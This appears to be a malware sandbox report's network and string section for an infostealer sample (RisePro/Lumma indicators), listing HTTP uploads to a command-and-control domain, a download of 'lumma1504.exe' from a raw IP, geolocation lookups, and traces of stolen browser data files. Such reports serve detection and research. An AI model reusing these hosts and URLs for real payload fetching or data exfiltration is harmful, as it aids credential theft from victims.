                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7091Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1388Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 591259Host: bordersoarmanusjuw.shop
                  Source: global trafficHTTP traffic detected: HEAD /lumma1504.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /lumma1504.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 193.233.132.253
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeCode function: 0_2_00D32890 recv,setsockopt,0_2_00D32890
                  Source: global trafficHTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                  Source: global trafficHTTP traffic detected: GET /lumma1504.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.253Cache-Control: no-cache
                  Source: unknownDNS traffic detected: queries for: ipinfo.io
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: bordersoarmanusjuw.shop
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1842940469.0000000005FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.253/lumma1504.exe
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.253/lumma1504.exedser
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.132.253/lumma1504.exesw
                  Source: 2q45IEa3Ee.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                  Source: 2q45IEa3Ee.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                  Source: 2q45IEa3Ee.exeString found in binary or memory: http://ocsp.sectigo.com0
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.00000000014EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/
                  Source: RegAsm.exe, 0000000A.00000002.1936828284.00000000037E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/#
                  Source: RegAsm.exe, 0000000A.00000002.1936237566.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/&Y
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/0
                  Source: RegAsm.exe, 00000011.00000002.2130384793.00000000015C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/O
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/San
                  Source: RegAsm.exe, 00000011.00000002.2130384793.00000000015C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/Xavf
                  Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1939197101.0000000000785000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2049332296.000000000358C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2048327163.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2130384793.00000000015C9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2131175305.0000000003840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/api
                  Source: RegAsm.exe, 00000007.00000002.1920835027.00000000014BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/api$
                  Source: RegAsm.exe, 0000000A.00000002.1936237566.00000000015CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/api(
                  Source: RegAsm.exe, 00000011.00000002.2131175305.0000000003840000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/apiM
                  Source: RegAsm.exe, 0000000A.00000002.1936237566.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/apiVY
                  Source: RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/apie
                  Source: RegAsm.exe, 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/apir
                  Source: RegAsm.exe, 0000000B.00000002.1939197101.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/es)
                  Source: RegAsm.exe, 0000000F.00000002.2048327163.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/k9
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/ll
                  Source: RegAsm.exe, 0000000B.00000002.1939197101.0000000000795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/pi
                  Source: RegAsm.exe, 00000007.00000002.1920616270.00000000013CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/piable
                  Source: RegAsm.exe, 00000011.00000002.2130384793.0000000001576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/rx
                  Source: RegAsm.exe, 0000000F.00000002.2048327163.00000000014EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop/y
                  Source: RegAsm.exe, 00000011.00000002.2130384793.000000000156B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop:443/api
                  Source: RegAsm.exe, 0000000A.00000002.1936237566.0000000001580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bordersoarmanusjuw.shop:443/apiSID
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017AB000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1627570903.00000000016F0000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/Content-Type:
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/L
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.0000000001767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/s
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52/0
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/81.181.57.52
                  Source: 2q45IEa3Ee.exeString found in binary or memory: https://sectigo.com/CPS0
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812141315.0000000005FBF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1814756856.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp, 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812141315.0000000005FBF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1814756856.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp, 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: 4yAbYkouo2kFHistory.0.dr, SMhcoWrJBtJiHistory.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: uw5Stgma3gbM9Xo4g_6cCoQ.zip.0.drString found in binary or memory: https://t.me/RiseProSUPPORT
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1821067278.0000000006026000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drString found in binary or memory: https://t.me/risepro_bot
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot.52igY
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botrisepro8Y
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1812931401.0000000005FE1000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1815262466.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000003.1811745370.0000000005FC0000.00000004.00000020.00020000.00000000.sdmp, _TP0jqeyFqX_Web Data.0.dr, PGpLy2WBlLFSWeb Data.0.dr, y_CqgZq8h7seWeb Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 2q45IEa3Ee.exe, 2q45IEa3Ee.exe, 00000000.00000003.1627570903.00000000016F0000.00000004.00001000.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: 2q45IEa3Ee.exe, 00000000.00000003.1820881268.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1878839470.0000000005FA7000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: 2q45IEa3Ee.exe, 00000000.00000002.1877753884.00000000017E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/tataX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
